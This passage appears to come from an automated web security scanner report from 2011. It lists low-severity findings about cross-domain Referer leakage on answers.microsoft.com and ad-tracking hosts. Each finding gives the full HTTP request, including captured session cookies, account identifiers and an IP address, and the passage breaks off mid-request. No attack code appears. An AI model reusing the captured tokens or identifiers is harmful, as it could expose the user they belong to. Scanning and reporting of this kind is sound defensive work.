GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

20.8. http://answers.microsoft.com/en-us/Forum/ForumThreadList previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://answers.microsoft.com
Path:	/en-us/Forum/ForumThreadList

Issue detail

The page was loaded from a URL containing a query string:

http://answers.microsoft.com/en-us/Forum/ForumThreadList?forumId=d6cb25ef-5e2a-e011-8a67-d8d385dcbb12&sort=LastReplyDate&dir=Desc&tab=answered&meta=zune_install&mod=&modAge=&page=1

The response contains the following link to another domain:

http://service.zune.net/

Request

GET /en-us/Forum/ForumThreadList?forumId=d6cb25ef-5e2a-e011-8a67-d8d385dcbb12&sort=LastReplyDate&dir=Desc&tab=answered&meta=zune_install&mod=&modAge=&page=1 HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; upthls=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MyAnswers_=1&fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MarkedHelpful_=1; sdninc=10; fmshb=0,1311089453813

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:32:14 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:31:13 GMT
Content-Length: 74507

<table id="threads">

<tr class="forumList isSticky" id="6211f4a7-5546-40f2-ade6-87a069cb9aa1">

<td class="forumListStatus forumHasAnswer" title="This question is answer
...[SNIP]...
<p>If your Zune player is no longer functioning, you may request service at <a href="http://service.zune.net" target="_blank">
<strong>
...[SNIP]...

20.9. http://answers.microsoft.com/en-us/Site/StartSignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://answers.microsoft.com
Path:	/en-us/Site/StartSignIn

Issue detail

The page was loaded from a URL containing a query string:

http://answers.microsoft.com/en-us/Site/StartSignIn?provider=wlid

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089370&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572

Request

GET /en-us/Site/StartSignIn?provider=wlid HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/ie/forum/ie9-windows_7/xss-filter-is-disabled-but-after-sending-several/4896766e-9a67-e011-8dfc-68b599b31bf5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; sdninc=3; fmshb=0,1311089377194

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089370&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:29:29 GMT
Content-Length: 414

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089370&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572">here</a>
...[SNIP]...

20.10. http://answers.microsoft.com/en-us/Site/StartSignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://answers.microsoft.com
Path:	/en-us/Site/StartSignIn

Issue detail

The page was loaded from a URL containing a query string:

http://answers.microsoft.com/en-us/Site/StartSignIn?provider=wlid

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089480&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572

Request

GET /en-us/Site/StartSignIn?provider=wlid HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install-player/mp3-conversion/efa762b3-d6d3-478f-9a59-1cd7414b0374
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; upthls=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MyAnswers_=1&fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MarkedHelpful_=1; frthls=Zune_LastReplyDate_Desc_answered_zune_install__=1; sdninc=14; fmshb=0,1311089475954

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089480&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:31:19 GMT
Content-Length: 414

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089480&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572">here</a>
...[SNIP]...

20.11. http://answers.microsoft.com/en-us/User/UserThreadList previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://answers.microsoft.com
Path:	/en-us/User/UserThreadList

Issue detail

The page was loaded from a URL containing a query string:

http://answers.microsoft.com/en-us/User/UserThreadList?userId=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc&sort=LastReplyDate&dir=Desc&tab=MyAnswers&forum=&page=1

The response contains the following link to another domain:

http://www.msn.com/

Request

GET /en-us/User/UserThreadList?userId=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc&sort=LastReplyDate&dir=Desc&tab=MyAnswers&forum=&page=1 HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/profile/fefc3b25-16e6-4403-ac47-6a6b73b7fbbc?tab=MyAnswers
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; sdninc=3; fmshb=0,1311089388223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:30:45 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:29:44 GMT
Content-Length: 70436

<table id="threads">

<tr class="forumList" id="1e6e9250-d05b-e011-8dfc-68b599b31bf5">

<td class="forumListStatus forumHasAnswer" title="This question is answered">

...[SNIP]...
<div class="hoverPreview">
Whenever I try to go to my home page, <a href="http://www.msn.com" target="_blank">
www.msn.com</a>, IE9 opens in "about;blank." I have to go to Tools/Internet Options and reset the "Use Current" tab to
<a href="http://www.msn.com" target="_blank">www.msn.com</a>
...[SNIP]...

20.12. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/172548/11408426983@x01

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01?

The response contains the following link to another domain:

http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif

Request

GET /2/ticketmaster/172548/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/172548/L19/48186436/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></A>

20.13. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01?

The response contains the following link to another domain:

http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif

Request

GET /2/ticketmaster/AirCanadaCentre/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre/L28/9647235/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></A>

20.14. http://bcp.crwdcntrl.net/px previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/px

Issue detail

The page was loaded from a URL containing a query string:

http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D

The response contains the following link to another domain:

http://ib.adnxs.com/seg?add=153795&t=1

Request

GET /px?Yz03MyZweGlkPTY5MzE%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU30Ry8DAaOgivDqIwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCsIzNY; 